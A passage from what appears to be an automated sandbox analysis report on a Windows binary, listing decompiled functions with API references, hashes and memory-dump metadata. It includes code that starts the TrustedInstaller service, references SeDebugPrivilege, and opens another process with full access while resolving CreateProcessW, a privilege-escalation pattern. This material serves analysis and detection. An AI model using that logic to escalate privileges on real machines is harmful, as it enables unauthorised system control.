				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

kernel32.dll, xrefs: 00409561
GetProcessTimes, xrefs: 00409570

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}

0x004056b5
0x004056c3
0x004056c5
0x004056cc
0x004056cf
0x004056d2
0x004056d5
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e8
0x004056ef
0x004056f2
0x004056f7
0x004056fd
0x00405832
0x00405832
0x00405835
0x00405835
0x00405838
0x0040583e
0x00405849
0x00405849
0x00405703
0x00405706
0x00405709
0x00405710
0x0040575b
0x00405766
0x0040577b
0x00000000
0x00000000
0x0040577d
0x00000000
0x0040577d
0x0040576b
0x0040576e
0x00000000
0x00405783
0x00405783
0x00405785
0x004057d1
0x004057dc
0x004057e4
0x004057e8
0x004057eb
0x004057ec
0x004057ef
0x004057ef
0x00000000
0x004057ef
0x0040578b
0x00000000
0x00000000
0x00405790
0x00405796
0x00405798
0x0040579e
0x004057a1
0x004057b4
0x004057a3
0x004057a5
0x004057a5
0x004057ba
0x004057c1
0x004057c3
0x004057c3
0x004057c8
0x004057cb
0x004057cb
0x004057ce
0x00000000
0x004057ce
0x00405717
0x0040571a
0x00405725
0x0040572a
0x0040572f
0x00405733
0x00405735
0x00405735
0x0040573e
0x00405743
0x00405746
0x0040574d
0x00405750
0x00405750
0x0040571a
0x004057f2
0x004057f2
0x004057f8
0x004057fe
0x004057fe
0x00405809
0x00000000
0x00000000
0x00405810
0x00405815
0x0040581a
0x0040581e
0x00405820
0x00405820
0x00405825
0x0040582b
0x00000000

APIs

Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

free.MSVCRT(?,00000000,?,00000000), ref: 004057A5

Strings

", xrefs: 004056C5

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID: "
API String ID: 1294909896-123907689
Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x004054bc
0x004054c4
0x004054cd
0x004054cf
0x004054d2
0x004054d5
0x004054d8
0x004054db
0x004054de

APIs

free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}

0x004055d1
0x004055d1
0x004055d5
0x004055da
0x004055df
0x004055e3
0x004055e4
0x004055e8
0x004055eb

APIs

free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
